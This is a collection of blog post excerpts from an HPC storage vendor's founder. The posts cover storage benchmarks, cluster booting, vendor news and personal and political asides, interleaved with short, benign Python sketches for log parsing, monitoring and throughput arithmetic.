eth1: addr not set/mask not set 1500 0.000 0.000
eth10: addr not set/mask not set 1500 0.000 0.000
eth11: addr not set/mask not set 1500 0.000 0.000
eth12: addr not set/mask not set 1500 0.000 0.000
eth13: addr not set/mask not set 1500 0.000 0.000
eth14: addr not set/mask not set 1500 0.
Posts
Its ... alive ....
Our little skunkworks project boots!!! Mwahahahaha! Must check off on our list:
1. design
2. build
3. boot
4. ???
5. profit (or something)!

Note to self: work on eeeeevul laughter …. And get step 4 ironed out too.
Posts
After 4 years, our deskside JackRabbit unit decided to shrug off its mortal coil
… and in the process, take down a drive, 5 of its friends, and our RAID card. We have backups from before the move (15+ days old … sigh). We’ve decided to go full monty on the new unit. It’s a JackRabbit JR4 with 12x 2TB drives: 2 hot spares, and a 10 disk RAID6 (8x data drives). 2x OS drives (on SSDs, rear mount). Leaves us 12 open bays.
Posts
Updating a design to modern concepts ...
So in order to (really) bring my monitoring app into the modern age, I want to change its flow from a synchronous on-demand event driven analysis and reporting tool, to an asynchronous monitoring and analysis tool, with an on-demand “report” function which is basically a presentation core atop the data set. There are many reasons for this. Not the least of which is that this should be far more efficient at handling what I want to do … not to mention more responsive.
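The change described here moves from gathering data when a report is requested to gathering continuously and reporting from what has already been collected. That maps naturally onto an asyncio design. Below is a minimal Python sketch under that assumption. The Monitor class, its methods, and the counter probe are hypothetical stand-ins, not the actual monitoring app.

```python
import asyncio
import contextlib
import itertools
import time
from collections import deque


class Monitor:
    """Hypothetical asynchronous monitor: collectors fill a shared data set,
    and report() is only a presentation layer over it."""

    def __init__(self, max_samples=10_000):
        # Bounded buffer of (timestamp, metric name, value) tuples.
        self.samples = deque(maxlen=max_samples)

    async def collect(self, name, probe, interval_s):
        # Poll one metric forever; runs independently of any report request.
        while True:
            self.samples.append((time.time(), name, probe()))
            await asyncio.sleep(interval_s)

    def report(self):
        # On-demand view: latest value per metric, no fresh data gathering.
        latest = {}
        for _, name, value in self.samples:
            latest[name] = value
        return latest


async def demo():
    mon = Monitor()
    ticks = itertools.count()  # stand-in for a real probe (e.g. reading /proc)
    task = asyncio.create_task(mon.collect("ticks", lambda: next(ticks), 0.01))
    await asyncio.sleep(0.1)   # let the collector run in the background
    snapshot = mon.report()
    task.cancel()
    with contextlib.suppress(asyncio.CancelledError):
        await task
    return snapshot


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

The design choice is that report() does no data gathering of its own. It only reads the bounded buffer the collectors fill, so its cost depends on the buffer size rather than on the probes.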
Posts
Every now and then, the truth leaks out
Good article from Matt Asay in The Register today.
This is about as truthful as it gets. There are many tiny startups, pulling in various fractions of $1M to more than $10M to develop … product features. Is this really the right approach for VCs? And this opens up some interesting new questions on startups and their product offerings themselves. Take Netflix. Running on Amazon S3. And what does Amazon do?
Posts
On my fun end of a week ...
(this was actually a while ago, just getting to publishing it now). Friday, I drove up to a local University to drop off our bid. I sent a note beforehand to let them know I might be a few minutes late, there was construction. Sure enough, got caught in a 30 minute slowdown. I was 13 minutes late. They said, “hey that’s great. We won’t look at it” Then on the way back, the old landlord refused to acknowledge that we were tenants, so they refused to refund our deposit.
Posts
Parsing apache logs ...
Seems I’m not alone in the world wanting to parse apache log files. I googled lots of people bitterly complaining about it. Some folks wanted to write a grammar, and a flex/yacc/bison thingy. I am sure that there are some Java programmers who’ve been working on this … oh … 6 or 7 years or so, and may be approaching a solution, with a Java byte code only slightly below 1 PB in size.
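For the common case, a single regular expression over Apache’s “combined” LogFormat (%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i") gets you most of the way without a grammar. Below is a minimal Python sketch that assumes the default combined or common formats. parse_line is a hypothetical name, and the sketch does not handle escaped quotes inside the request or user-agent fields.

```python
import re

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
# The referer/agent pair is optional so plain "common" format lines also match.
COMBINED_RE = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)


def parse_line(line):
    """Return a dict of fields, or None if the line does not match."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # %b logs "-" when no body bytes were sent.
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


sample = ('127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] '
          '"GET /apache_pb.gif HTTP/1.0" 200 2326 '
          '"http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"')

if __name__ == "__main__":
    print(parse_line(sample))
```

Lines that fail to match come back as None. Counting those is a cheap way to spot log entries that use a custom format.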
Posts
Good programming tools and good program implementation
Way back in my early days at web programming stuff, I started out with HTML::Mason as a templating engine. There is nothing wrong with Mason, it’s actually quite good. But it encourages the same sort of “code-in-page” designs that the entire language of PHP was built around. I’m mostly a Perl guy for application level stuff these days … have done my time with Fortran, Python, x86 assembly, C/C++, and many others.
Posts
Company's email and web are now on EC2
Turns out Comcast doesn’t follow through (even when you call them many times to try to get them to). Thanks #Comcast . On Thursday, I bought a Mifi (pay as you go) from Verizon. Got it into the office. Had moved the web/mail stuff to Amazon EC2 “just in case” Comcast pulled a … well … Comcast. Yeah, took me a little while to fix the email and web side. We’ve been using our router appliance as our SOA for dns, and I had to unplug it at the old site (got everything out before 5pm Friday).
Posts
What high performance storage isn't ...
This happens often. We get a call from a user who’s seen my postings on the Gluster or other lists. They’ve set up a storage system, and the performance is terrible. Is there anything that can be done about this? We dig into this, and find out that the people bought hardware, usually fairly low end/cheap brand name (e.g. tier 1) nodes, with limited disk options, and are running 1 disk for OS, and have another single larger SATA or SAS disk for storage.
Posts
... and old faces leaving and new joining
One of our guys has left the organization. This is always hard. He is a good person, I like him a great deal. But I understand that sometimes there isn’t as good a fit as we might like there to be. If you happen to know a great HPC organization that needs an awesome senior sales dude, please email at the day job (landman At ScalableInformatics.com), and I’ll pass the contact along to him.
Posts
New office ...
… movers pick up the old office bits tomorrow, and bring it to the new office. Have some (re)construction to do, some racks to stand up, an AC unit to hook up … and then the important things (which I learnt from my friends and customers in the UK) … a refrigerator and good cappuccino machine to buy …
Posts
Something ... awesome ... this way comes
Ever had an OMFG moment? Ever wish you could share it? In time, in time.
Posts
Q: So why did this go "bang" ?
A: I updated the OS. Bad … bad Joe. Very bad. Don’t do that. Baaaaaaad Joe. … and now I get to fix the email, and the file server portion … and … Thank gosh for my … er … paranoid backing up of useful things. Pack-rat-ism is not a disease … it’s a quality … a feature.
Posts
Python ... grrrr
Hacking up some python classes and object bits for a project. Honestly, this would be soooooo much easier in Perl, but for a number of reasons, the person started it in Python. So we are trying to contribute. And I am running into some of the more joyous elements of python. Such as completely inane error messages which tell you next to zero about what the real problem is. Thankfully, I have google.
Posts
Ahhh ... IPsec ... How I loathe thee ...
Ok, maybe not the spec so much. Maybe just the client codes. Working on setting up an IPsec tunnel. The only IPsec implementation that I’ve tried on the client side that actually seems to work (e.g. get to a point where I can debug it) is Apple’s. Haven’t tried the Cisco yet, we don’t have a support contract with them, so we can’t download it and test it. Since we are setting this up for a customer who does, either we’ll VPN into their site and set it up, or work something out.
Posts
OT: as the political season rolls on ...
I’ve mentioned it before here, that this is a presidential election year in the US, and I expect it to be a nasty one, at best. We in the states largely fall into one of two major parties, with some of us proclaiming independence or preference for other parties in the noise. The media in this country is biased pretty hard in one direction with one solitary exception. Every now and then they admit it (as the NY Times did a few days ago).
Posts
Epic failure: Apple security mismatches
Was trying to install an app on Saturday. Up popped a request for more information, including a second attempt at getting my password, and then 3 “security” questions, including “What city was I first kissed in.” Um. Ok. That is an EPIC FAIL in and of itself, but let’s go on to the real … BIG EPIC FAIL. The security questions presented on the Apple app do not match those, or even come close to matching those on the appleid.
Posts
The TB sprint updated ...
Previous results here. 12.4TB/hour. A new JackRabbit unit with some updates. New results: 1TB written in 228.2 seconds. 15.8TB/hour writes
Run status group 0 (all jobs):
WRITE: io=1024.6GB, aggrb=4597.1MB/s, minb=4597.1MB/s, maxb=4597.1MB/s, mint=228167msec, maxt=228167msec

and for the reads …

Run status group 0 (all jobs):
READ: io=1024.6GB, aggrb=5341.9MB/s, minb=5341.9MB/s, maxb=5341.9MB/s, mint=196392msec, maxt=196392msec

This is 18.3TB/hour reads. Writing 1PB on this machine would take almost 65 hours. So if we could break the writes across 65 machines (9 racks), we could write 1PB in 1 hour.
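The TB/hour figures follow from the fio aggregate bandwidth once the units are pinned down. Below is a small Python sketch. It assumes fio’s “MB” is MiB (2^20 bytes) and that the post’s TB and PB are binary units (TiB, PiB). Under that assumption the numbers reproduce the ones quoted. The machine count assumes perfectly linear scaling.

```python
import math

MIB_PER_TIB = 1024 ** 2  # assumes fio's "MB" and the post's "TB"/"PB" are binary units


def tib_per_hour(mib_per_s):
    """Convert a sustained MiB/s rate into TiB per hour."""
    return mib_per_s * 3600 / MIB_PER_TIB


def hours_to_write(tib, mib_per_s):
    """Wall-clock hours to stream `tib` TiB at a sustained rate."""
    return tib / tib_per_hour(mib_per_s)


write_rate = tib_per_hour(4597.1)           # aggrb from the WRITE run above
read_rate = tib_per_hour(5341.9)            # aggrb from the READ run above
hours_1pib = hours_to_write(1024, 4597.1)   # 1 PiB = 1024 TiB on one box
boxes_for_one_hour = math.ceil(hours_1pib)  # assumes perfectly linear scaling

if __name__ == "__main__":
    print(f"write {write_rate:.1f} TiB/h, read {read_rate:.1f} TiB/h")
    print(f"1 PiB on one box: {hours_1pib:.1f} h; boxes for 1 h: {boxes_for_one_hour}")
```

Run as-is, it prints 15.8 and 18.3 TiB/h, about 64.9 hours for 1 PiB on a single box, and 65 boxes to do it in an hour.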
Posts
Oh joy ...
Pretty good probability I’ll be needing to go to London this weekend to fix a problem caused by a somewhat overzealous local support org. See the motherboard post from a few days ago. Turns out they damaged the replacement they put in. I like London. I don’t like having to do this though.
Posts
Update on our lawyergram
A few months ago, the bank which had foreclosed on our now former landlord executed what could be called a legal pressure maneuver. They wanted us to buy the space we are renting. They threatened to sue us for back rent. Our lawyer skillfully deflected this, pointing out their several failures in the process. They finally admitted they were seeking to pressure us to buy it. Go figure. So we are about to move to a larger spot.
Posts
The danger in modifying precision built and tuned machines ...
… is that they won’t be precision tuned after you are done with them. And worse, much of this is self-inflicted in various cases. We try to ship absolutely peak performance machines. Tuned as much as possible, though in some cases, customers make requests that go against high performance. We try to explain the issues, but customers are always right, even when they aren’t. In a number of cases, customers wipe what we’ve done.
Posts
"Hey, here's a nice machine, let's replace its motherboard"
Something like this just happened to one of our customers. I am aghast that this was done the way it was, but it was. One of these things where you don’t find out that there was a service issue until its “done”. For various definitions of “done”. I anticipate being on a phone call to Europe in a few hours to discuss my definition of “done” with the people who did this, and ask them if their definition of “done” includes the concept of operating correctly.
Posts
Mebbe there is a reason that I am in "fly over" country ...
So here I am, toiling in the salt mines (just don’t tell my wife it’s not really that bad), trying to eke out a living selling, servicing, and supporting some insanely fast storage kit to a range of customers, when I hear that Instagram had sold for $1B. My first thought. What the 4K (phonetic, just don’t say it out loud) is Instagram? And what did it do that made it worth $1B?
Posts
Way way back ...
… when I was at SGI … oh … 16 years ago or so, someone, for some reason sent me an email where they made some specious claims. I calmly pointed out to them where I caught their error, what the error was, and how they could fix it. They then proceeded to attack me in email, and started bugging me on my work phone. Later, after I had left SGI and started Scalable, someone had posted some rather poorly thought out discussion of something, and attacked me (again) for some rather idiotic reasoning.
Posts
Is LinkedIn just Usenet with a pretty face?
I am starting to think so. Had a little discussion with someone I thought would be professional, who made some interesting claims, and didn’t quite like it when challenged. And it devolved from there. I guess it is funny to see someone try to explain stuff to me, who doesn’t quite know my background, or experience, or … I’ve heard from others who believe that LinkedIn is as complete a waste of time as Facebook.
Posts
OT: Annoying spammers
Some idiots have taken our company’s phone number, inserted it into their caller-id bits (seemingly with SIP phones), and have been harassing people. So we get frustrated people calling us, asking us if we called them. No we didn’t. I hate phone marketeers as much as everyone. This is really annoying. Can’t see any rational reason for this other than someone trying to steal the company’s reputation.
Posts
sad/exciting time ahead
One of our customers has become fed up with the issues they’ve run into on Gluster. Started about a year ago, with some odd outages in the 3.0.x system, and didn’t improve with 3.2.x … in some instances it got worse. RDMA support in 3.0.x was pretty good, there were other bugs (which were annoying). The migration to 3.2.x was rocky. Libraries left from 3.0.x were somehow picked up and some things just failed.
Posts
High performance firewall ... with a nice 10GbE port
Have a customer with a hard problem. They need to handle very high data rate traffic, VPNs, and all manner of things. Imagine a GbE in (or more). They asked us to build a firewall that could handle this. Most of the appliance firewalls have some capability, but few will really survive a serious traffic onslaught. Most use very low power processors, on purpose, because most of the time the traffic isn’t intense.
Posts
SRP joy
ok, not really. Late last night, while benchmarking some alternative mechanisms to connect {MD,OS}S to their respective {MD,OS}T for a Lustre design we are proposing for an RFP, I decided to revisit SRP. I liked SRP in the past, it was a simple protocol, SCSI over RDMA. How could you go wrong with this? Well, I found out last night. I put our stack on a DeltaV connected via 10GbE and QDR IB ports to our respective switches.
Posts
Taking siFlash-SSD out for a spin, and cracking the throttle ...
… half open. [update] video: http://scalability.org/wp-content/videos/screencast_video.flv

I won’t show the fio output until I get the unit back and get some more testing in. Also, I’ve discovered something … I guess … depressing about fio, in that what it reports for performance isn’t necessarily what the storage subsystem sees. This isn’t just fio, it’s pretty much all tools that talk to the file/storage API at a high level. The low level actual results (you have to grab data from the OS reporting infrastructure to see this) differ, sometimes wildly, from the high level API results.
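One way to see what the storage subsystem actually did, as opposed to what fio reports, is to snapshot the kernel’s per-device counters in /proc/diskstats before and after a run. Below is a minimal Python sketch that assumes a Linux host. The helper names are hypothetical, and the sketch relies on /proc/diskstats reporting sector counts in 512-byte units.

```python
SECTOR_BYTES = 512  # /proc/diskstats counts 512-byte sectors regardless of device


def parse_diskstats(text):
    """Map device name -> (sectors read, sectors written) from /proc/diskstats text."""
    stats = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 10:
            continue
        # major minor name reads merged sectors_read ms_reading writes merged sectors_written ...
        stats[fields[2]] = (int(fields[5]), int(fields[9]))
    return stats


def snapshot(path="/proc/diskstats"):
    """Read the current counters for every block device."""
    with open(path) as fh:
        return parse_diskstats(fh.read())


def device_mib_per_s(before, after, device, seconds):
    """Read and write MiB/s for one device between two snapshots."""
    def to_mib(sectors):
        return sectors * SECTOR_BYTES / 2 ** 20

    r0, w0 = before[device]
    r1, w1 = after[device]
    return to_mib(r1 - r0) / seconds, to_mib(w1 - w0) / seconds
```

A typical use would be before = snapshot(), then run the fio job, then after = snapshot(), then device_mib_per_s(before, after, "sdb", elapsed). Here "sdb" and elapsed stand in for your device name and measured wall time. Comparing the result against fio’s aggrb shows how far the two views diverge.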
Posts
HPC Linux on Wall Street was fun
Spoke to lots of interesting people. Ran some benchmarks. Will talk about those next post. Found hits on the corporate site from a Yahoo stock board. Ok, that was interesting. Had a number of great conversations … before, during, and after the show. I am still in NY, working on a siCluster at a data center.
Posts
Looking forward to the HPC Linux on Wall Street conference
Will be there with a new siFlash unit. Uses some new Flash and SSD devices. Should be able to talk about that soon. What’s cool is this is our chassis. Not a COTS chassis from one of the larger vendors. This is a new chassis we worked on designing with the ODM. The unit is a prototype, and sadly the motherboard we will use for this isn’t quite in full production yet, so we are using a stand in.
Posts
This is huge: SCOTUS throws out gene patents
If I read this correctly, this applies to all gene patents. Which opens up genes to multiple groups trying to target specific diseases. It’s good for people as it increases the likelihood that no one company can “landgrab” a set of genes implicated in various diseases and do nothing with them. It’s bad for the business models of companies attacking these diseases, especially smaller biotech/startups. The model wasn’t sound to begin with, you cannot patent nature or natural things.
Posts
Incredibly busy as usual
I have lots of drafts in queue, just not enough time to finish them. I’ll make a concerted effort this weekend. As an update to a previous post, I managed not to collapse during my brown belt test (had some respiratory issue going on … allergies, or a cold, or something). The kata were not “hard”, but they expect different things from you at higher rankings. You can’t go blasting through the kata like a robot (as I probably did with my first one).
Posts
"Irrevocable worldwide..."
Every now and then we get customers asking us to perform only services under contract. They send us what they think their T&C ought to be. Yeah … I especially like the lines that relieve us of our IP, our rights to collect royalties, our rights to what we develop, … Yeah. Ok, maybe not so much. I have to admit, when I see this, my first reaction is to start laughing.
Posts
Tiburon extensions
Basically, I can boot quite a few Linux systems completely stateless. I like this. Makes setting up clusters drop-dead simple. Makes setting up/testing hardware similarly simple. Where I am going with this: I’ve been playing with Solaris 11, and to a lesser extent, the Illumian distros for Solaris. So far, I like what I see in Solaris 11, and I like the Debian-ed version of Solaris in the Illumian distro. For the former, I want to see if we can formally offer this on our gear.
Posts
Code angry: fixing a self-inflicted bug in Tiburon
I hate when I try to write generalized code up front. That is, I try to write a code base that is sufficiently generic that it works for all possible use cases. Some argue for this sort of development. I don’t like it. But I do fall into this every now and then. Tiburon suffered from some of this. I want one system to “bind them all, and in the PXE process, boot them.”
Posts
Cool bug in grub in Centos 6.2 (and therefore in RHEL 6.2)
So if you are like us, you are a belt and suspenders person … you like multiple administrative modalities. You like them because you know they are needed. Because breakage usually happens at the least opportune time, and you need a way in to express your control. So we have KVM. And we have IPMI. And we have a serial over lan (replacing the old serial consoles). If you are more than 5 miles away from the gear, you will appreciate having these multiple modes.
Posts
Another step in a journey of many miles
This is OT from HPC and from Storage. Sort of. The death this past week of Andrew Breitbart, whether you liked him, hated him, or hadn’t a clue who he was, again highlighted for me the need to take time off, for me, every now and then. Just a few hours per week of time to get out and exercise. To burn off frustration from high on the pony scale discussions.
Posts
Thought I was going nuts ...
Ran into this earlier in the week and thought it strange. Centos 6.2, brand new installation on a box that has had Centos 5.7 installed. Set of our newer RAID cards, 10GbE, and IB cards. This is our in-lab JackRabbit JR5 machine (happily still the fastest single spinning rust machine you can get in market). As soon as I start the PXE load … CRASH!!!! Kernel doesn’t panic, it just gets stuck.
Posts
then comes the realization ...
that to process all the requests, and service all the potential business we have, I’m gonna have to hire a Joe-clone (since cloning is illegal in Michigan for some reason). Possibly 2. Let’s see if we get these contracts first, but this is a good problem to have. But back to the Joe-clone … would we be allowed to not pay a clone of me, or provide health coverage, as they were just another instance of the “Joe” object?
Posts
back from the UK, and a good reason to drink Guinness
I enjoyed my trip. Well, not the part of being away from my family, but there is much to see/experience in London. A curious difference between London and the UK in general and the US is the apparent lack of public restrooms (or WC’s if I have the right localization). Especially in a crowded space like Covent Garden. The customers in the UK (spent time with two at their sites, on the phone with ~5 across the world, and working with ~4 via email) have good problems (not as in blocking problems, but emergent problems that occur in a variety of use cases).
Posts
Check one item off my bucket list
Spent the early afternoon at Westminster Abbey. Saw the tomb/memorials of Sir Isaac Newton (all of physics), James Clerk Maxwell (electromagnetic theory), Faraday (magnetism), and P.A.M. Dirac (quantum theory). A shame they didn’t have anything for Turing (or if I missed it, lemme know and I’ll go back). Also saw memorials and tombs for Shakespeare (he’s buried at Stratford on Avon I think), Chaucer, Jane Austen, Keats, Shelley, … Very nice place, highly recommend it.
Posts
The blame game
This isn’t what you might think from the title. It’s an observation. I hope I don’t misstate what I intend to say, so feel free to chime in if you don’t agree with the wording. When you have a situation where a customer has a set of vendors, and a problem that needs resolution, the customer will gravitate towards assigning blame for the problem to the most competent of the vendors, the most proactive of the vendors, in the hope that it will be resolved, regardless of whether or not that vendor’s gear/stack is in any way involved.
Posts
Working on solving a problem for the day job
Long ago, I concluded that the day job was not a bank or credit-granting institution. We aren’t equity financed at this time, and we have no finance arm or division with the capital backing to extend large amounts of credit to customers. And we have customers. Lots of them. Many, if not most, ask for credit terms. But we can’t really float a loan of 1/5 of our yearly revenue for 90 days, as some of these opportunities would require.
Posts
Well, I'd call this the best commercial I saw during the game
In part, because they weren’t overtly … or even subtly … selling anything.
You can see the commercials here.
Posts
Sorry about that
Was working on a post about the upcoming US elections. It wasn’t ready. I had edited it a number of times, and hadn’t gotten my complete thoughts down. Managed to hit the publish button midway through. Pulled it down. It wasn’t ready for consumption. Short version: US politics, always a messy game, is going to be ugly this year. We have hard-core ideologues arrayed on the (effectively 2) sides, unwilling to compromise their positions for a “greater good” of the body politic.
Posts
Ahhh ... the wafting smell of election year politics ...
Yeah, every few years we get some major stank drifting through our corner of the globe. This is going to be a very nasty election cycle. Very nasty. Many of the memes have been tried out against some of the candidates, and what stuck … well … stuck (and stunk). As usual, the good and bright people, the ones we need in office to help make hard decisions and then leave … once again, these folks don’t seem to want all that goes with the process.
Posts
Highest sustained spinning rust write speed to date on a box
Yeah … the day job hardware. Current generation. Single box. Single thread. Single file system.
Run status group 0 (all jobs):
  WRITE: io=130692MB, aggrb=4702.9MB/s, minb=4815.8MB/s, maxb=4815.8MB/s, mint=27790msec, maxt=27790msec

File size is several times RAM size.
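As a quick sanity check on fio’s summary line, the aggregate bandwidth should be roughly the total I/O divided by the run time. The sketch below assumes a single job (so `maxt` covers the whole run) and keeps fio’s own MB unit throughout; the function name is illustrative, not anything fio provides.

```python
def aggregate_bandwidth_mb_s(io_mb: float, runtime_ms: float) -> float:
    """Throughput in MB/s from total I/O (MB) and wall-clock runtime (ms)."""
    if runtime_ms <= 0:
        raise ValueError("runtime must be positive")
    return io_mb / (runtime_ms / 1000.0)


# Values copied from the fio WRITE summary: io=130692MB, maxt=27790msec
bw = aggregate_bandwidth_mb_s(130692, 27790)
print(f"{bw:.1f} MB/s")  # agrees with fio's aggrb=4702.9MB/s to within rounding
```

Because the file is several times larger than RAM, the page cache can hold only part of what was written, so most of that rate has to come from the disks themselves.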
Posts
Growth at day job last year: 60%-ish
Considering the economy, the hard drive manufacturing issues in Thailand, etc. Yeah, this is pretty awesome. Gonna have a big tax bill. And yes, I am gonna grumble that the money would be better spent on ~3 new employees who would generate real economic activity, rather than sending it to the government to waste. Such is life. I don’t want to prognosticate for the year, just yet. But the trajectory we are on is making last year (our 3rd record year in a row), look … mild.
Posts
Busy ... as usual
I’ve been readying a UPS ripping post (not the function, but the company). May backburner that for now. But been really REALLY busy. This is very good, in all aspects. Have lots of opportunities, many quotes out, some telegraphed orders (we know they are coming, we’ve been told, they are working their way through the systems), … this is turning out to be a very good year, and it’s only 2-Feb. Hoping I have time to actually write that longer business model post.
Posts
Exactly
Article here. It’s interesting that they make very similar points to what I’ve suggested in the past. Even more to the point, they bring up the very real specter of Lysenkoism rearing its ugly head … but now we can call it AGW-ism or CO2-ism. If you dare disagree with those in power, you will be fired and shunned. Lack of evidentiary support be damned, full speed ahead. Lysenko set back Soviet era biology by decades.
Posts
Every now and then ...
we give a quote to someone, they see a part number, find a vendor who is selling this at some enhanced discount for any number of reasons, and then ask us to match it. I am guessing that they don’t realize we actually compare our costs to various measures, and make sure our pricing is not out of whack (sometimes our suppliers just can’t seem to give us the same deals they give others, go figure).
Posts
Intel snarfs up Qlogic Infiniband
I guess this gets Qlogic out of the IB arena. Good catch by Rich at InsideHPC. I had spoken to a number of folks at Intel over the years w.r.t. IB, and they said they were keeping their options open. IB riser boards are available for some of their motherboards, and from what I have seen, Intel has a renewed push into the motherboard space. Not sure about the server space in general; they’ve always had that, and I think they will keep doing it (at least as a reference design basis).
Posts
A few months into the gluster acquisition by Red Hat ...
… just received a note indicating that our Gluster Reseller contract was voided, and that we would be seeing a new partner portal for Red Hat Storage coming soon where we could apply again for reseller status. Hmmm …. Reading over the information I saw on the Red Hat storage platform, it looks like they are going full on appliance route, which diminishes the value we can potentially add to the platform, and removes much of the differentiation we can do at the stack level (better kernels, up to date drivers, tweaked/tuned drivers/OS, …).
Posts
Hmmm ...
Saw this linked from /. (Slashdot). UEFI boot is set to replace the old BIOS boot. There are positives and negatives to this. New software is always buggy, and UEFI won’t magically become bug free. UEFI has security controls for signed OS booting (ostensibly to protect users). But abusing security systems to exclude competitive/alternative booting … yeah … maybe not such a good idea. It looks like Microsoft is trying to demand that its ARM hardware partners not enable anything but Windows 8 or an equivalent signed OS (is Android signed?
Posts
OT: What is and what should never be
Had to get a Led Zeppelin reference in at least once a year on the blog … Pathology report came back. Ok, in the movie series The Matrix, there is a set of scenes where the storytellers want you to believe that the character (Neo, in the case of the clip below) was moving with “super-human” speed, and able to move and accelerate a very large mass (his body) faster than a very tiny mass (the bullet).
Posts
More than a year in, and where are they now?
It’s 2-January-2012, and assuming the Mayans were wrong (ok, technically I’ve not heard of any suggestion they did anything more than stop their calendar on a convenient-for-them boundary), an interesting question is, what has happened to the company-formerly-known-as-Sun’s HPC assets? Lustre is one of the most well known, and it now has some type of future ahead of it. I’ll talk about that in a later post. This future was most definitely not assured 1 year ago, and there was considerable uncertainty about its longevity, as Oracle had, about a year ago, let go most of the developers.
Posts
OT: T+7 hours ... its done
Bilateral Mastectomy with a sentinel node biopsy. The latter appears to be clean. I can exhale now. Well, mostly. The more detailed pathology data should be ready next week. The rebuilding part is in process. Another few hours. Readying some good jokes to keep the Mrs. happy. Let her know not to worry. U of M hospital guest internet is … annoying. Looks like they let 3 TCP ports out to the world (22, 80, 443).
Posts
Oh no, more code golf!
A new code golfing site. Gaaaak! If I have time to work on such diversions, I’ll post mine under the ID numbercruncher. [update] Played with the starburst code. Have something that works (though they failed to specify their input method, or their output requirement, e.g. newlines, etc.) This is at 135 characters:
$l=@a=split//,shift;$i=-1;while($i++< $l){map$x[$_]=" ",0..$l;$i==int$l/2?@x=@a:map$x[$_]=$a[$i],$i,$l/2,$l-$i-1;print join"",@x,"\n";}
which for the input “asdfd” gives
a a a
 sss
asdfd
 fff
d d d
among other things.
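The golfed Perl is hard to read, so here is a plain restatement in Python of what it appears to compute. The rule is inferred from the “asdfd” sample rather than from the (unspecified) puzzle statement: row i places character i at column i, at the middle column, and at the mirrored column n-1-i, and the middle row is the whole word. Like the Perl, it assumes an odd-length input; unlike the Perl, it omits the trailing padding spaces and the extra blank row the Perl loop prints on its last iteration.

```python
def starburst(word: str) -> list[str]:
    """Render `word` as a starburst: a diagonal, a vertical, and an
    anti-diagonal crossing at the centre, with the full word as the middle row."""
    n = len(word)
    mid = n // 2
    rows = []
    for i, ch in enumerate(word):
        if i == mid:
            rows.append(word)  # middle row: the word itself
            continue
        row = [" "] * n
        for col in (i, mid, n - 1 - i):  # diagonal, vertical, anti-diagonal
            row[col] = ch
        rows.append("".join(row))
    return rows


for line in starburst("asdfd"):
    print(line)
```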
Posts
This one hits it out of the park ...
On James' blog. Heh. I think we’ve had, and seen others have, this conversation before. RAID is not a backup. Backup is very important. Ok, I did burst out laughing. The low-level scan of 1PB of data to find data in the “no_backup” folder … Yeah. Customer has a file system. We’ve asked them “is your data important?” and they’ve answered “no”. And we really try to find out from them whether or not it’s important, as they didn’t spend money on a backup, and there is the potential for a single failure to take down their data.
Posts
Did you ever realize you were doing something wrong?
In a number of our tools, I’ve written rudimentary command parser hacks using getopt and some creative ARGV processing. And this almost always led to something more complex and harder to develop/maintain. For something else we are looking at, I’ve been exploring “compilers”. Basically, define a grammar to do something, then do it. Keep the grammar consistent, simple, and easy to manage. Turns out that this maps far better into our target code than I would have thought.
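The post doesn’t say what the grammar looked like, so the following is only a minimal sketch of the general idea, using a made-up three-rule command language (`help`, `show NAME`, `set NAME = VALUE`): tokenize the input, match it against the grammar, and only then act on it. The grammar, the `Command` type, and the `parse`/`execute` functions are all hypothetical.

```python
import shlex
from dataclasses import dataclass
from typing import Dict, Optional

# Hypothetical grammar:
#   command := "help" | "show" NAME | "set" NAME "=" VALUE


@dataclass
class Command:
    verb: str
    name: Optional[str] = None
    value: Optional[str] = None


def parse(line: str) -> Command:
    """Match one input line against the grammar; reject anything else."""
    tokens = shlex.split(line)  # handles quoting, e.g. set motd = "hello world"
    if not tokens:
        raise SyntaxError("empty command")
    verb, args = tokens[0], tokens[1:]
    if verb == "help" and not args:
        return Command("help")
    if verb == "show" and len(args) == 1:
        return Command("show", args[0])
    if verb == "set" and len(args) == 3 and args[1] == "=":
        return Command("set", args[0], args[2])
    raise SyntaxError(f"does not match grammar: {line!r}")


def execute(cmd: Command, state: Dict[str, str]) -> str:
    """Act on an already-validated command."""
    if cmd.verb == "help":
        return "commands: help | show NAME | set NAME = VALUE"
    if cmd.verb == "show":
        return state.get(cmd.name, "<unset>")
    state[cmd.name] = cmd.value  # only "set" remains
    return "ok"


state: Dict[str, str] = {}
print(execute(parse("set threads = 8"), state))  # ok
print(execute(parse("show threads"), state))     # 8
```

Keeping all validation in `parse` means the code that does the work never sees malformed input, and adding a command means adding one grammar rule rather than another special case in ARGV handling.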
Posts
Is Java done?
Latest updates from all distro vendors. Java plugins no longer work on any browsers. Updated from Oracle, or from the OpenJDK stack, or … Doesn’t matter. Can’t get it to work anywhere. This is a positive development … right? We can call this “experiment” over? Maybe all the nice folks who’ve been coding their IPMI/iLOM tools for years as Java clients will now … please … switch to HTML5 so we can drop this anachronism from our machines once and for all?
Posts
partially OT: something I am going to write about soon
Business models and business model changes. Not ours, but a general observation I’ve made. This is oddly important for me (outside of the business) as I’ve been writing some stuff I’ve been thinking of submitting for “publication”, and what “publication” means is rapidly changing. FWIW: this is science fiction stuff. I’m an avid reader of these things (much to my wife’s dismay, given the number of books I buy), and I am enjoying writing this stuff as well.
Posts
Incremental update: an extra 10-15% out of JackRabbit JR4
This is nice. Our JackRabbit JR4 high performance tightly coupled storage and computing unit, 54TB usable (72TB raw). Simple 64GB uncached streaming read/write.
Run status group 0 (all jobs):
   READ: io=65412MB, aggrb=2515.3MB/s, minb=2575.7MB/s, maxb=2575.7MB/s, mint=26006msec, maxt=26006msec

Run status group 0 (all jobs):
  WRITE: io=65412MB, aggrb=2619.3MB/s, minb=2682.7MB/s, maxb=2682.7MB/s, mint=24974msec, maxt=24974msec

